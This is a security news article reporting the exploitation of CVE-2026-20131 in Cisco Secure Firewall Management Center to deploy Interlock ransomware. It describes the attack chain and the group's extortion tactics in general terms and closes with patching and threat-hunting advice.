A critical zero-day vulnerability in Cisco Secure Firewall Management Center (FMC) is being actively exploited by threat actors to deploy Interlock ransomware across enterprise networks, according to recent security research.
The flaw, tracked as CVE-2026-20131, has been abused in real-world attacks for over a month before public disclosure, giving attackers a significant operational advantage.
The vulnerability stems from an insecure deserialization issue (CWE-502) in the web-based management interface of Cisco FMC.
By sending a specially crafted serialized Java object, unauthenticated remote attackers can execute arbitrary code with root-level privileges.
With a CVSS score of 10.0, the flaw is at the highest severity level and enables full-system compromise without requiring prior authentication.
Notably, while Cisco Security Cloud Control (SCC) is also affected, Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) configurations are not, thereby narrowing the attack surface to FMC deployments.
Threat intelligence indicates that exploitation began as early as January 26, 2026, providing attackers with a 36-day window of undetected activity.
Initial access was achieved via complex HTTP requests containing embedded URLs that delivered malicious configuration payloads to vulnerable firewall management systems.
The campaign was partially exposed after a misconfigured staging server used by attackers leaked operational artifacts.
This incident allowed researchers to reconstruct Interlock’s attack chain, revealing a highly structured, multi-stage intrusion process.
Following successful exploitation, attackers deploy a comprehensive PowerShell-based reconnaissance script to enumerate the compromised Windows environment.
The script systematically gathers hardware specifications, virtual machine details, and active network connections.
Collected data is then compressed into host-specific archives and exfiltrated, enabling attackers to map the victim’s infrastructure and prioritize high-value assets.
To maintain persistence, Interlock operators leverage custom-built remote access trojans (RATs) developed in both JavaScript and Java.
The JavaScript variant establishes encrypted WebSocket communications using rotating RC4 keys, ensuring stealthy command-and-control (C2) operations.
Meanwhile, the Java-based RAT leverages GlassFish libraries to provide redundant backdoor access, increasing resilience against partial remediation efforts.
In addition, attackers deploy a fileless, memory-resident webshell that dynamically decrypts incoming commands at runtime.
This technique minimizes forensic artifacts on disk and complicates detection by traditional endpoint security tools.
Temporal analysis of attacker activity suggests operations aligned with the UTC+3 time zone, indicating a likely geographic origin in Eastern Europe or the Middle East.
The Interlock ransomware group appears to prioritize sectors where operational downtime directly translates into financial pressure, including healthcare, manufacturing, education, and critical engineering.
Beyond encryption, Interlock employs aggressive extortion tactics.
Their ransom notes explicitly reference data protection regulations, threatening victims with potential regulatory penalties in addition to data leaks an approach designed to amplify urgency and increase payment likelihood.
Cisco has confirmed that no effective workarounds exist for CVE-2026-20131, making immediate patching the only reliable mitigation strategy.
Organizations using Cisco Secure FMC are strongly advised to apply the latest security updates without delay.
Security teams should also conduct thorough threat hunting activities post-patching, focusing on indicators of compromise such as unusual PowerShell execution, anomalous WebSocket traffic, and memory-resident artifacts.
Given the stealth techniques employed, particular attention should be paid to in-memory threats that may evade conventional detection mechanisms.
The ongoing exploitation of this vulnerability highlights the persistent risk posed by zero-day flaws in perimeter security infrastructure. It underscores the importance of rapid patch management and proactive threat detection.
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google
